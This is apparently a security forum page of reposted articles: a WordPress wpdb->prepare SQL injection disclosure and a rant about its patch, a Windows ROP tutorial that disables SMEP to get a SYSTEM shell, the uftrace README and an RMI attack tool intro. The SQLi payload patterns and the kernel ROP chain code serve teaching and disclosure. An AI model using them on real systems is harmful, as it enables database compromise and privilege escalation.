Everything posted by Nytro
-
Yes, interesting, big words... "We’re kind of killing it by filtering the $, |, ;, ` and & chars in our default configuration, making it a lot harder for an attacker to inject arbitrary commands." -> And what if the developer uses these characters deliberately? The module can cause problems. After all, you cannot really "kill a bug class" as long as the language itself allows that bug class. For example, in Java, to run a system process with ProcessBuilder you pass it a List<String>: a vector whose first element is the command (e.g. ls, cat, etc.) and every following element is one argument. It does not matter whether an argument contains spaces or special characters; it is treated as a single literal argument, which gives you something like "Prepared Statements" for process execution. "The goto payload for XSS is often to steal cookies. Like Suhosin, we are encrypting the cookies with a secret key, the IP of the user and its user-agent. This means that an attacker with an XSS won’t be able to use the stolen cookie, since he (often) can’t spoof the IP address of the user." -> Does it only do """encryption""" (a generous word if the key material is just the IP address and user-agent), or does it also verify the IP address on the server side? "This feature can’t be deployed on websites that already stored serialized objects (ie. in database)" -> Unfortunately, I think that is the most common case. The approach is interesting: you install a module and your problems go away. But for obvious reasons it is not, and never will be, enough. The problem starts higher up: if you allow a user to do stupid things and do not force them to write safe code, you will have problems.
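The argument-vector point above can be shown with a short, self-contained sketch. This is an illustration, not code from the module being discussed; the command and the "malicious" input are made up:

```java
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.List;

public class SafeExec {
    // Each List element is passed to the OS as one literal argv entry,
    // so shell metacharacters in user input cannot spawn extra commands.
    public static String run(List<String> argv) throws Exception {
        Process p = new ProcessBuilder(argv).redirectErrorStream(true).start();
        StringBuilder out = new StringBuilder();
        try (BufferedReader r = new BufferedReader(
                new InputStreamReader(p.getInputStream()))) {
            String line;
            while ((line = r.readLine()) != null) out.append(line).append('\n');
        }
        p.waitFor();
        return out.toString();
    }

    public static void main(String[] args) throws Exception {
        // The "; id" here is just text inside a single argument, never a command.
        System.out.print(run(List.of("echo", "user input: ; id")));
    }
}
```

Contrast this with handing the same string to `sh -c`, where the shell would parse the `;` and run a second command. That is the "prepared statement for processes" property the comment refers to.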
-
The Humble Book Bundle: Hacking Reloaded presented by No Starch Press
Nytro replied to yukti's topic in Stiri securitate
Pay $1 (about €0.84) or more!
- Game Hacking (Nick Cano)
- The Car Hacker's Handbook (Craig Smith)
- The Smart Girl's Guide to Privacy (Violet Blue)
- Metasploit (David Kennedy, Jim O'Gorman, Devon Kearns, Mati Aharoni)
- 35% off Print Books from nostarch.com
Pay $8 (about €6.69) or more to also unlock!
- Penetration Testing (Georgia Weidman)
- iOS Application Security (David Thiel)
- Android Security Internals (Nikolay Elenkov)
- The Book of PF, Third Edition (Peter N. M. Hansteen)
- Practical Forensic Imaging (Bruce Nikkel)
Pay $15 (about €12.54) or more to also unlock!
- The Book of PoC||GTFO (Manul Laphroaig) (New Bestseller!)
- Hacking, Second Edition (Jon Erickson)
- The IDA Pro Book, Second Edition (Chris Eagle)
- The Practice of Network Security Monitoring (Richard Bejtlich)
- Absolute OpenBSD, Second Edition (Michael W. Lucas)
- Practical Packet Analysis, Third Edition (Chris Sanders)
-
slavco Aug 23

Wordpress SQLi

There won't be an intro; let us jump straight to the problem. This is the WordPress database abstraction's prepare method:

public function prepare( $query, $args ) {
    if ( is_null( $query ) )
        return;

    // This is not meant to be foolproof -- but it will catch obviously incorrect usage.
    if ( strpos( $query, '%' ) === false ) {
        _doing_it_wrong( 'wpdb::prepare', sprintf( __( 'The query argument of %s must have a placeholder.' ), 'wpdb::prepare()' ), '3.9.0' );
    }

    $args = func_get_args();
    array_shift( $args );

    // If args were passed as an array (as in vsprintf), move them up
    if ( isset( $args[0] ) && is_array( $args[0] ) )
        $args = $args[0];

    $query = str_replace( "'%s'", '%s', $query ); // in case someone mistakenly already singlequoted it
    $query = str_replace( '"%s"', '%s', $query ); // doublequote unquoting
    $query = preg_replace( '|(?<!%)%f|', '%F', $query ); // Force floats to be locale unaware
    $query = preg_replace( '|(?<!%)%s|', "'%s'", $query ); // quote the strings, avoiding escaped strings like %%s
    array_walk( $args, array( $this, 'escape_by_ref' ) );
    return @vsprintf( $query, $args );
}

This code contains two unsafe PHP practices that can lead to serious vulnerabilities in the WordPress ecosystem. Before we get to the SQLi case, I'll cover another issue, which arises from the following functionality:

if ( isset( $args[0] ) && is_array( $args[0] ) )
    $args = $args[0];

This means that if you have something like:

$wpdb->prepare($sql, $input_param1, $sanitized_param2, $sanitized_param3);

and you control $input_param1 (e.g. $input_param1 = $_REQUEST["input"]), then you can supply your own values for the remaining parameters. In some cases this means nothing, but in others it can easily lead to RCE, given the nature and architecture of WordPress itself.
SQLi vulnerability

To achieve SQLi in the WP framework through this prepare method, we must understand how its core PHP function works. That function is vsprintf, which is essentially sprintf. This means $query is a format string and $args are the parameters: the directives in the format string define how the args are placed into it, i.e. into the query. A very, very important sprintf feature is argument swapping. :) On top of that we have the following lines of code:

$query = str_replace( "'%s'", '%s', $query ); // in case someone mistakenly already singlequoted it
$query = str_replace( '"%s"', '%s', $query ); // doublequote unquoting
$query = preg_replace( '|(?<!%)%f|', '%F', $query ); // Force floats to be locale unaware
$query = preg_replace( '|(?<!%)%s|', "'%s'", $query ); // quote the strings, avoiding escaped strings like %%s

i.e. every bare %s is rewritten into '%s'. From all of the above we reach the following conclusion: if we can put a string containing %1$%s into $query, we can salute our SQLi. After the prepare method runs, we get an extra ' in the query, because %1$%s becomes %1$'%s', and after sprintf it becomes $arg[1]'. For now this is just theory, and most probably improper usage of the prepare method, but if we find something interesting in the WP core itself, then nobody can blame lousy developers who don't follow coding standards and the recommendations in the API docs. The most interesting function is delete_metadata, which performs exactly the actions described above: when it is called with all 5 parameters set, $meta_value != "" and $delete_all = true, we have our working PoC:
if ( $delete_all ) {
    $value_clause = '';
    if ( '' !== $meta_value && null !== $meta_value && false !== $meta_value ) {
        $value_clause = $wpdb->prepare( " AND meta_value = %s", $meta_value );
    }

    $object_ids = $wpdb->get_col( $wpdb->prepare( "SELECT $type_column FROM $table WHERE meta_key = %s $value_clause", $meta_key ) );
}

$value_clause will hold our input, but we need to be sure $meta_value already exists in the DB in order for this SQLi-vulnerable snippet to be executed (remember this one). delete_metadata, called with the desired number of parameters, is invoked from wp_delete_attachment, which in turn is called in wp-admin/upload.php, where the $post_id input is taken directly from $_REQUEST. Let us check wp_delete_attachment and its constraints before we reach the desired line, delete_metadata( 'post', null, '_thumbnail_id', $post_id, true );. The only obstacle preventing this code from being executed is the following:

if ( !$post = $wpdb->get_row( $wpdb->prepare( "SELECT * FROM $wpdb->posts WHERE ID = %d", $post_id ) ) )
    return $post;

but again, due to the nature of sprintf and the %d directive, we have a bypass: attachment_post_id %1$%s your_sql_payload. Here I'll stop for today (see you tomorrow with part 2: https://medium.com/websec/wordpress-sqli-poc-f1827c20bf8e), because in order for an authenticated user with permission to create posts to execute a successful SQLi attack, they need to insert "attachment_post_id %1$%s your_sql_payload" as the _thumbnail_id meta value.

Quick fix for this use case (if you allow the author role or higher on your WP setup): at the top of wp_delete_attachment, right after global $wpdb;, add the following line:

$post_id = (int) $post_id;

Impact on the WP ecosystem

This unsafe method has quite a huge impact on the WP ecosystem. There are affected plugins. Some of them were already informed and patched their issues; some gave credit, some did not.
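To make the placeholder-quoting step at the heart of this bug concrete, here is a minimal sketch of the four rewrite lines from prepare, translated to Java purely for illustration. Only the string transformation is reproduced, not escaping or the vsprintf call:

```java
public class PrepareRewrite {
    // Mirrors the str_replace/preg_replace sequence inside wpdb::prepare
    public static String rewrite(String query) {
        query = query.replace("'%s'", "%s");          // singlequote unquoting
        query = query.replace("\"%s\"", "%s");        // doublequote unquoting
        query = query.replaceAll("(?<!%)%f", "%F");   // locale-unaware floats
        query = query.replaceAll("(?<!%)%s", "'%s'"); // re-quote every bare %s
        return query;
    }

    public static void main(String[] args) {
        // a meta_value containing %1$%s has been smuggled into the query text
        String q = "SELECT post_id FROM wp_postmeta WHERE meta_value = %1$%s";
        System.out.println(rewrite(q));
        // the %s inside %1$%s gets re-quoted, yielding ... meta_value = %1$'%s'
        // vsprintf then consumes "%1$'" as a directive, leaving a stray quote
        // and an attacker-controlled '%s' behind
    }
}
```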
Others have pushed `silent` patches, but no one cares about the safety of all. In the next posts on this topic I'll cover the most common places and practices where issues like these occur, and I'll release the vulnerable core methods besides the one pointed out, so everyone can help get this issue solved.

Responsible disclosure

This approach is more than responsible disclosure; I'll refer you to the impact paragraph above and to this H1 report: https://hackerone.com/reports/179920

Promo

If you are a WP developer, a WP host provider, or a WP security product provider with a valuable list of clients, we offer a subscription list and we are exceptional (B2B only).

Source: https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
-
On WordPress Security and Contributing

…and how neither really worked today. A sad story in two parts, where I'm rash, harsh and untactful. An explanation, a rant, a call for support, a call for action. You do not have to agree with me; I may be just an asshole and haven't realized it yet.

Part 1: The %1$%s vulnerability

This post will overview two issues that have hit me where it hurts with the recent WordPress 4.8.2 release. A handful of issues were addressed, among which a vulnerability in $wpdb->prepare, which was fully disclosed 4 weeks ago here. But let's start from the very beginning.

A very long time ago a bad decision was made: $wpdb->prepare was born, based on sprintf functionality. The Codex states that the method provides "sprintf-like" functionality but only supports %d, %s and %f placeholders. Cool. As time went on, people figured out that numbered placeholders also work in this function, and they were used at liberty, all over the place. Yoast SEO used them, some Automattic internal code used them, as well as a crapton of other instances of usage from GitHub's search: https://github.com/search?q=wpdb->prepare+%1%24s&type=Code&utf8=✓

What they didn't know is that numbered placeholders are not safe to use. First and foremost, numbered placeholders were not escaped. So

$wpdb->prepare( 'SELECT * FROM wp_posts WHERE post_ID = %1$s', '1 OR 1 = 1' );

would actually yield a SQL injection: since the placeholder is not quoted, it results in SELECT * FROM wp_posts WHERE post_ID = 1 OR 1 = 1;. Classic. For the developers who figured this out (most of the SQL would actually break when using numbered placeholders without quotes), the usage was as safe as sprintf itself.

Then along comes a security researcher, discloses a vulnerability in $wpdb->prepare, and states that if a developer makes a mistake and types %1$%s instead, there's potential for SQL injection. How?
%1$%s gets transformed to %1$'%s' by $wpdb->prepare, because one of the features of the method is to unquote instances of "%s" and '%s' and then quote them again. What does sprintf do? %1$' gets eaten up as an invalid placeholder, while %s' is left up for grabs and gets transformed into whatever we want, but with a single quote at the end of it, breaking the SQL. An exploit would need:

1. a developer to make a typo and not notice it in the syntax highlighting of their code editor,
2. the attacker to have access to the input parameters.

A hypothetical piece of code would be SELECT * FROM wp_users WHERE user_ID = %1$%s OR user_ID = %2$%s. With both inputs controlled by the attacker, if argument 1 is "1 OR 1 != " and argument 2 is "injection", we get the following: SELECT * FROM wp_users WHERE user_ID = 1 OR 1 != ' OR user_ID = injection'. Which would simply return true for all users, because 1 is not equal to "OR user_ID = injection", is it?

So think of the chances of such code existing in the wild. Now think of the chances that $wpdb->prepare is not used. Probably slim, at least by what we know of the vulnerability and how much has been disclosed.

Four weeks later, WordPress 4.8.2 enters the scene unexpectedly. And the patch it contains simply prevents anything other than %s, %f and %d from existing. Hell breaks loose. Sites with Yoast SEO installed stop functioning in the backend due to some code that relied on numbered placeholders. Needless to say, the aftermath of this decision will be felt for many months to come. Generated SQL with numbered placeholders is invalid SQL; a database error is thrown; a 500 error is returned in the browser. They call this "hardening", a patch to "prevent plugins and themes from accidentally causing a vulnerability". That's funny. Why don't we prevent stray quotes in the query? Or why don't we prevent calls to $wpdb->query without a preceding call to $wpdb->prepare, or unite them into one and break code that does not escape?
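The original, pre-4.8.2 hazard of unquoted numbered placeholders is easy to reproduce outside PHP, since Java's format strings happen to support the same %1$s positional syntax. The table and values below are invented for illustration:

```java
public class NumberedPlaceholder {
    public static void main(String[] args) {
        // prepare() only re-quotes the literal "%s" token; a numbered "%1$s"
        // slips through unquoted, so the argument lands bare inside the SQL.
        String template = "SELECT * FROM wp_posts WHERE post_ID = %1$s";
        String sql = String.format(template, "1 OR 1 = 1");
        System.out.println(sql);
        // SELECT * FROM wp_posts WHERE post_ID = 1 OR 1 = 1
    }
}
```

With the plain %s placeholder the same input would have been wrapped in quotes (and escaped) by prepare, which is exactly why the numbered form was dangerous.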
But I'm very sure the security team wrecked their heads for weeks and this was the decision that had to be made. Who stood behind the final decision, what the reasoning was, how the aftermath will be dealt with, nobody knows. Us risky developers can only comply. We can only wholeheartedly trust that countless nights of sleep were lost pondering better ways of solving the issue. And I'm not going to comment on how a zero-day was out in public for 4 weeks and how nobody was made aware of the breaking change to $wpdb->prepare. I don't really care at this point. Policy is policy; whoever got into trouble has already spoken (or will) about how nobody was notified about the breaking change. It was undocumented; it's ultimately the fault of whoever used it. Thus, I can't call this a regression, as developers relied on undocumented functionality. It's not a bug either.

But wouldn't it be great if $wpdb->prepare actually supported numbered placeholders? Seeing that they have been used, and will continue to be attempted for years to come, I would say it's a good idea. Why hasn't anyone requested this before? Well, because it worked. Now it no longer does. A Trac ticket requesting the feature is due, so that the community can figure out a way to introduce documented support for these popular numbered placeholders.

Part 2: The feature request

Meet ticket #41925, the first of a handful of duplicates that wanted numbered placeholders "back". A discussion (or at least a monologue for now) to see how we can introduce their safe support in $wpdb->prepare, and why the security team had to do what they did. I quickly threw a patch together to get the ball rolling, as well as some test cases. In less than 12 hours a wontfix/close decision was made by one of the decision makers. Biased by some sort of undisclosed test cases that my patch failed to pass. Biased by what the team tried to do with the vulnerability.
Biased by the internal misfortunes and hurdles they were met with while trying to solve it. Biased by the fact that numbered placeholders were not supported to begin with. Just like that: a wontfix/closed stamp. Where's the discussion? Where are the test cases that fail? Is it not a valid feature request? We've had more absurd ones hang open for years. Why is a valid feature request all of a sudden stamped in a way similar to some of the silliest single-line feature requests out there? Why should a thought-through, code-heavy and well-versed (at least in my opinion, but hey, I'm biased) ticket carry the stigma of a wontfix/closed, discouraging people from actively participating in exploring the problem space and finding a solution, because one of the higher-ups said "No way, Jose"?

A disrespectful spit in the face is what I felt. After spending over 8 hours trying to understand what the issue is and how we can begin to address it? Shut down. Just like that? And an hour after the feature request was closed as wontfix, Slack had this weekly or monthly (I don't know) new contributors day, where developers and designers are encouraged to work on issues, etc. Oh, the freaking irony! If this is not hypocrisy, I don't know what is.

Again: it's a feature request. It's related to a vulnerability. In order to implement a good solution we have to dissect the vulnerability; there's no other way, whether you like it or not. We have to write hundreds of test cases, try to break the proposed solutions. But a wontfix/closed? "Why bother?", a passerby would say. "Oh, but you can still discuss and comment on it. And you can even reopen it," some would say. After all the "encouragement"? After a core committer takes an action that is literally equal to saying "We won't fix this, no point in trying. Shoo away, go home, kids" when effort and determination to get things going are clearly shown? Such disregard is pretty offensive and depressing.
After speaking to several other people from the Russian community, I've been told that this behavior is not unheard of: the almighty "No" of the higher-ups, just because. The community is sometimes met with hurdles upon hurdles, a contributing environment that sometimes verges on the disgusting. Is this really the WordPress open-source project?

Part 3: On safety nets vs. bad code.

Source: https://codeseekah.com/2017/09/21/on-wordpress-security-and-contributing/
-
Return Oriented Programming Tutorial

Hi! In this tutorial we will go through a very basic way of creating a ROP (Return Oriented Programming) chain in order to bypass SMEP and get kernel-mode execution on the latest Windows installation despite Microsoft's mitigations.

Setup: This is meant to be a hands-on tutorial, so it is best to download the binary provided and experiment on your own with the main ideas presented. This is what you will need in order to follow the full tutorial:

HEVD: download from here.
Windows 10 RS3: here.
WinDbg & Symbols: kd, Symbols.
Hyper-V: How to enable Hyper-V.
File sharing between the VM and the host: Setup File Sharing.
My debug binary: download link.

Introduction: Return Oriented Programming (in the computer security context) is a technique used to bypass certain defence mechanisms, like DEP (Data Execution Prevention) and SMEP. If you would like to read more about SMEP, check out the links in the main README.md file of this project. The main characteristic of this method is that instead of running pure shellcode directly from a user-supplied buffer, we use small snippets of existing code called gadgets. Say, for example, I want to place 0x1FA5 in rsp; usually I would simply write in my shellcode:

mov rsp, 0x1FA5

When using ROP, we instead try to find some address in memory (this can be in a DLL, an EXE image, or the kernel image) that does exactly the same thing, and instead of writing the instruction in the payload, we place the memory address of that code in the buffer so that it gets executed. So if I know that at a certain offset from the base address of some DLL, say hal.dll, there is a useful instruction, then assuming I can get code execution, passing the address of that instruction to the exploit target at runtime will get it executed.
When building a ROP chain, the chain is composed of many small gadgets like this one; you can think of it as shellcoding with snippets taken from other executable memory. Here is a little snippet to visualize this: in that picture, as an example, we send our exploit target a buffer that contains hal+0x6bf0 followed by hal+0x668e, and so on.

You may ask yourself: why would we want to do that? Why not simply write the shellcode as is? Well, if you can simply write the shellcode as is, it is far easier to do that, but as mentioned before, it may not always be possible. So let's say a little about SMEP. SMEP is a security measure that uses hardware features to protect the endpoint from attacks such as kernel exploits. The main idea is to mark each page allocated in memory as either kernel address space (kernel-executable/readable/writable) or user space. This way, when the kernel executes code, the code's address is checked (if the hardware offers that capability) to see whether it is a user-space or kernel-mode address. If the code is found to be marked as user space, the kernel stops the execution flow with a critical error, a BSOD. So if we simply try to exploit a stack overflow like we did on Windows 7, we get this outcome: [BSOD]. The main idea of ROP here is to route the execution flow through kernel-executable addresses that pass the check, until we can execute our own payload. Enough talk, let's debug!!! Assuming you have set up the environment as stated above and have a working machine, open an administrator command prompt and type as follows: before running anything, hit break on the debugger (open the debug window and click Break), then open View -> Registers.
Scroll all the way down and the result should be: [registers]. Next, type g and hit Enter; the machine should run as normal. Run the sample exe I have provided; you should get a breakpoint and this output should appear on the debugger: as you can see, this breakpoint is different from the one we hit before. First take a look at the address that triggered the breakpoint. At the breakpoint before, we hit:

0xfffff80391595050 cc int 3

and now we got:

Break instruction exception - code 0x80000003 (first chance)
0x0000017039f00046 cc int 3

As you can see, the first address is a kernel-space address and the second a user address. This is because I have placed 0xCC in my shellcode. Next, open the registers again; the outcome should be as follows: [registers]. You may ask yourself why the cr4 register changed, and how it is that we do not get the BSOD as before. Well, because the binary builds a ROP chain as follows:

// To better align the buffer, it is useful to declare a
// memory structure; otherwise you will get holes
// in the buffer and end up with an access violation.
typedef struct _RopChain {
    PUCHAR HvlEndSystemInterrupt;
    PUCHAR Var;
    PUCHAR KiEnableXSave;
    PUCHAR payload;
    // PUCHAR deviceCallBack;
} ROPCHAIN, *PROPCHAIN;

// Pack the buffer as:
ROPCHAIN Chain;

// nt!HvlEndSystemInterrupt+0x1e --> Pop Rcx; Retn;
Chain.HvlEndSystemInterrupt = Ntos + 0x17d970;

// kd> r cr4
// ...1506f8
Chain.Var = (PUCHAR)0x506f8;

// nt!KiEnableXSave+0x7472 --> Mov Cr4, Rcx; Retn;
Chain.KiEnableXSave = Ntos + 0x434a33;

Meaning that we have sent the vulnerable driver a stack-overflow buffer, but instead of supplying our shellcode we have given the driver the buffer above, which is composed of:

Pop Rcx            <-- kernel-mode address
Retn
0x506f8
Mov Cr4, Rcx
Retn
(ShellCodeAddress)

So basically we have "jumped" to our shellcode from other kernel-mode addresses, and we did not get the BSOD: we gave the kernel a kernel-mode address, so we passed the check, and then we flipped the bit in the cr4 register value to trick the system into believing SMEP is not supported by the firmware. We can see that by running the kv command: you can see the kernel-mode addresses in the call stack and the execution flow, as well as the NOPs we placed in our buffer. Hit g again and you should see the outcome below: as you can see, we hit an access violation. This is because in this demo I did not fix the return address pointer, so we can do this together. Hit r on the debugger: as you can see, the stack is a mess, and the registers as well; the return address tries to read a pointer from rax, which points to the zero address, so we get an access violation. So just like we had to "jump" to our shellcode to avoid SMEP, we need to jump back to a reasonable state. But how can we know what a good address to jump back to is?
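Besides the C struct approach, such a chain is often packed as raw little-endian qwords. Here is a sketch using the gadget offsets quoted above; the base and shellcode addresses are placeholders for illustration, not real values:

```java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.nio.ByteBuffer;
import java.nio.ByteOrder;

public class RopChainBuilder {
    // x86_64 stack slots are 8-byte little-endian values
    static byte[] qword(long v) {
        return ByteBuffer.allocate(8).order(ByteOrder.LITTLE_ENDIAN).putLong(v).array();
    }

    // Same four-slot layout as the ROPCHAIN struct above
    public static byte[] build(long ntosBase, long shellcode) throws IOException {
        ByteArrayOutputStream chain = new ByteArrayOutputStream();
        chain.write(qword(ntosBase + 0x17d970L)); // pop rcx ; ret
        chain.write(qword(0x506f8L));             // CR4 value with the SMEP bit cleared
        chain.write(qword(ntosBase + 0x434a33L)); // mov cr4, rcx ; ret
        chain.write(qword(shellcode));            // finally return into the payload
        return chain.toByteArray();
    }

    public static void main(String[] args) throws IOException {
        byte[] buf = build(0xfffff80391400000L, 0x0000017039f00000L);
        System.out.println(buf.length + " bytes"); // 4 qwords = 32 bytes
    }
}
```

The order of the qwords is what matters: each `ret` pops the next slot into rip, so the buffer reads like a tiny program executed top to bottom.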
When we looked at the stack before, we could see the execution flow. 0x00007fffb29013aa, the lowest address, called the IOCTL; then we got to our shellcode from the overflow (the NOPs). A good thing to do would be to return to one of the original calls on the stack to resume execution. If we take a look at 0x00007fffb29013aa, we can see it is marked as UREV (user executable), so if we jump to that address we will be in the same situation as before (BSOD); we need to find another place on the stack to jump to. Let's look at nt!IofCallDriver+0x59, which is on the stack as well; we can even see what code is at this location by running the command below: we can see that this function simply returns back to the caller and is also KREV (kernel executable), so it will be a good choice. While I was finding gadgets I was doing exactly the same thing: looking for KREV addresses that contain useful code for me, like mov cr4, rcx, with the 'u' command in kd. OK, but how can we jump to that address? Open up the registers again and copy the first instruction address in the output of kd> u nt!IofCallDriver+0x59 as follows: place it in rip (in View -> Registers) and hit g again. Back in the box, you should have a command prompt running as Local System. So this is the end of the tutorial. I hope it was useful; now you know a bit more about ROP and have some basic tools to build your own ROP chain. My example code can be found here: C0de. And I challenge you to fix the return address programmatically! For more information please go to the main README of this project and follow the links provided (how to find gadgets, ROP, SMEP, etc.). Source: https://github.com/akayn/demos/tree/master/Tutorials
-
uftrace

The uftrace tool traces and analyzes the execution of a program written in C/C++. It was heavily inspired by the ftrace framework of the Linux kernel (especially the function graph tracer) and supports userspace programs. It provides various kinds of commands and filters to help analyze program execution and performance.

Homepage: https://github.com/namhyung/uftrace
Tutorial: https://github.com/namhyung/uftrace/wiki/Tutorial
Chat: https://gitter.im/uftrace/uftrace

Features

It traces each function in the executable and shows time durations. It can also trace external library calls, but only their entry and exit are supported; it cannot trace internal function calls inside a library unless the library itself was built with profiling enabled. It can show the detailed execution flow at the function level and report which function has the highest overhead. It also shows various information related to the execution environment. You can set up filters to exclude or include specific functions when tracing. In addition, it can save and show function arguments and return values. It supports multi-process and/or multi-threaded applications. With root privilege, it can also trace kernel functions (with the -k option) if the system enables the function graph tracer in the kernel (CONFIG_FUNCTION_GRAPH_TRACER=y).

How to use uftrace

The uftrace command has the following subcommands:

record : runs a program and saves the trace data
replay : shows program execution in the trace data
report : shows performance statistics in the trace data
live   : does record and replay in a row (default)
info   : shows system and program info in the trace data
dump   : shows low-level trace data
recv   : saves the trace data from network
graph  : shows function call graph in the trace data
script : runs a script for recorded trace data

You can use the -? or --help option to see the available commands and options.

$ uftrace
Usage: uftrace [OPTION...]
            [record|replay|live|report|info|dump|recv|graph|script] [<program>]
Try `uftrace --help' or `uftrace --usage' for more information.

If omitted, it defaults to the live command, which is almost the same as running the record and replay subcommands in a row (but it does not record the trace info to files). For recording, the executable should be compiled with the -pg (or -finstrument-functions) option, which generates profiling code (calling mcount or __cyg_profile_func_enter/exit) for each function.

$ uftrace tests/t-abc
# DURATION    TID     FUNCTION
  16.134 us [ 1892] | __monstartup();
 223.736 us [ 1892] | __cxa_atexit();
            [ 1892] | main() {
            [ 1892] |   a() {
            [ 1892] |     b() {
            [ 1892] |       c() {
   2.579 us [ 1892] |         getpid();
   3.739 us [ 1892] |       } /* c */
   4.376 us [ 1892] |     } /* b */
   4.962 us [ 1892] |   } /* a */
   5.769 us [ 1892] | } /* main */

For further analysis, you'd better record it first, so that the analysis commands replay, report, graph, dump and/or info can be run multiple times.

$ uftrace record tests/t-abc

This creates an uftrace.data directory that contains the trace data files. The other analysis commands expect this directory to exist in the current directory, but a different one can be used with the -d option.

The replay command shows execution information like the above. As you can see, t-abc is a very simple program that merely calls the a, b and c functions. In the c function it calls getpid(), which is a library function implemented in the C library (glibc) on normal systems; the same goes for __cxa_atexit().

Users can use various filter options to limit which functions are recorded/printed. The depth filter (-D option) omits functions below the given call depth. The time filter (-t option) omits functions running less than the given time. The function filters (-F and -N options) show/hide functions under the given function. The -k option enables tracing kernel functions as well (needs root access).
With the classic hello world program, the output would look like below (note: I changed it to use fprintf() with stderr rather than the plain printf() to make it invoke a system call directly):

$ sudo uftrace -k hello
Hello world
# DURATION    TID     FUNCTION
   1.365 us [21901] | __monstartup();
   0.951 us [21901] | __cxa_atexit();
            [21901] | main() {
            [21901] |   fprintf() {
   3.569 us [21901] |     __do_page_fault();
  10.127 us [21901] |     sys_write();
  20.103 us [21901] |   } /* fprintf */
  21.286 us [21901] | } /* main */

You can see that the page fault handler and the write syscall handler were called inside the fprintf() call.

It can also record and show function arguments and return values, with the -A and -R options respectively. The following example records the first argument and the return value of the 'fib' (fibonacci number) function:

$ uftrace record -A fib@arg1 -R fib@retval fibonacci 5
$ uftrace replay
# DURATION    TID     FUNCTION
   2.853 us [22080] | __monstartup();
   2.194 us [22080] | __cxa_atexit();
            [22080] | main() {
   2.706 us [22080] |   atoi();
            [22080] |   fib(5) {
            [22080] |     fib(4) {
            [22080] |       fib(3) {
   7.473 us [22080] |         fib(2) = 1;
   0.419 us [22080] |         fib(1) = 1;
  11.452 us [22080] |       } = 2; /* fib */
   0.460 us [22080] |       fib(2) = 1;
  13.823 us [22080] |     } = 3; /* fib */
            [22080] |     fib(3) {
   0.424 us [22080] |       fib(2) = 1;
   0.437 us [22080] |       fib(1) = 1;
   2.860 us [22080] |     } = 2; /* fib */
  19.600 us [22080] |   } = 5; /* fib */
  25.024 us [22080] | } /* main */

The report command lets you know which function spends the longest time, including its children (total time).

$ uftrace report
  Total time   Self time       Calls  Function
  ==========  ==========  ==========  ====================================
   25.024 us    2.718 us           1  main
   19.600 us   19.600 us           9  fib
    2.853 us    2.853 us           1  __monstartup
    2.706 us    2.706 us           1  atoi
    2.194 us    2.194 us           1  __cxa_atexit

The graph command shows the function call graph of a given function.
In the above example, the function graph of function 'main' looks like below:

$ uftrace graph main
# function graph for 'main' (session: 8823ea321c31e531)
backtrace
================================
 backtrace #0: hit 1, time 25.024 us
   [0] main (0x40066b)

calling functions
================================
  25.024 us : (1) main
   2.706 us :  +-(1) atoi
            :  |
  19.600 us :  +-(1) fib
  16.683 us :    (2) fib
  12.773 us :    (4) fib
   7.892 us :    (2) fib

The dump command shows the raw output of each trace record. You can see the result in the Chrome browser once the data is processed with uftrace dump --chrome. Below is a trace of clang (LLVM) compiling a small C++ template metaprogram.

The info command shows system and program information from when the trace was recorded.

$ uftrace info
# system information
# ==================
# program version     : uftrace v0.6
# recorded on         : Tue May 24 11:21:59 2016
# cmdline             : uftrace record tests/t-abc
# cpu info            : Intel(R) Core(TM) i7-3930K CPU @ 3.20GHz
# number of cpus      : 12 / 12 (online / possible)
# memory info         : 20.1 / 23.5 GB (free / total)
# system load         : 0.00 / 0.06 / 0.06 (1 / 5 / 15 min)
# kernel version      : Linux 4.5.4-1-ARCH
# hostname            : sejong
# distro              : "Arch Linux"
#
# process information
# ===================
# number of tasks     : 1
# task list           : 5098
# exe image           : /home/namhyung/project/uftrace/tests/t-abc
# build id            : a3c50d25f7dd98dab68e94ef0f215edb06e98434
# exit status         : exited with code: 0
# elapsed time        : 0.003219479 sec
# cpu time            : 0.000 / 0.003 sec (sys / user)
# context switch      : 1 / 1 (voluntary / involuntary)
# max rss             : 3072 KB
# page fault          : 0 / 172 (major / minor)
# disk iops           : 0 / 24 (read / write)

How to install uftrace

uftrace is written in C and tries to minimize external dependencies. Currently it requires libelf from the elfutils package to build, and there are some more optional dependencies.
Once you have installed the required software on your system, it can be built and installed like the following:

$ make
$ sudo make install

For more advanced setup, please refer to the INSTALL.md file.

Limitations
It can trace a native C/C++ application on Linux.
It cannot trace an already running process.
It cannot be used for system-wide tracing.
It supports x86_64, ARM (v6 or later) and AArch64 for now.

License
The uftrace program is released under GPL v2. See the COPYING file for details.

Sursa: https://github.com/namhyung/uftrace
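As a sanity check on the numbers above: the report says fib was called 9 times in total, and the replay shows fib(5) returning 5. A small Python mirror of the traced function reproduces both counts; note uftrace itself traces native C/C++ binaries, and the base cases here are an assumption inferred from the fib(1) = 1 and fib(2) = 1 lines in the replay:

```python
# Hypothetical Python re-implementation of the traced fib() program,
# used only to cross-check the Calls column of the uftrace report.
def fib(n, counter):
    """fib as in the traced program: fib(1) == fib(2) == 1."""
    counter[0] += 1          # one increment per entry, like uftrace's Calls column
    if n <= 2:
        return 1
    return fib(n - 1, counter) + fib(n - 2, counter)

calls = [0]
result = fib(5, calls)
print(result, calls[0])  # → 5 9
```

The counts match the trace: fib(5) expands to one call each of fib(5) and fib(4), two of fib(3), three of fib(2) and two of fib(1), nine in total.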
BaRMIe

BaRMIe is a tool for enumerating and attacking Java RMI (Remote Method Invocation) services. RMI services often expose dangerous functionality without adequate security controls; however, RMI services tend to pass under the radar during security assessments due to the lack of effective testing tools. In 2008 Adam Boulton spoke at AppSec USA (YouTube) and released some RMI attack tools, which disappeared soon after; even with those tools, a successful zero-knowledge attack relies on a significant brute-force attack (~64 bits / 9 quintillion possibilities) being performed over the network. The goal of BaRMIe is to enable security professionals to identify, attack, and secure insecure RMI services. Using partial RMI interfaces from existing software, BaRMIe can interact directly with those services without first brute forcing 64 bits over the network.

Download version 1.0 built and ready to run here: https://github.com/NickstaDB/BaRMIe/releases/download/v1.0/BaRMIe_v1.0.jar

Disclaimer
BaRMIe was written to aid security professionals in identifying insecure RMI services on systems which the user has prior permission to attack. Unauthorised access to computer systems is illegal and BaRMIe must be used in accordance with all relevant laws. Failure to do so could lead to you being prosecuted. The developers of BaRMIe assume no liability and are not responsible for any misuse or damage caused by this program.

Usage
Use of BaRMIe is straightforward. Run BaRMIe with no parameters for usage information.

$ java -jar BaRMIe.jar
 [BaRMIe ASCII-art banner]
                                v1.0
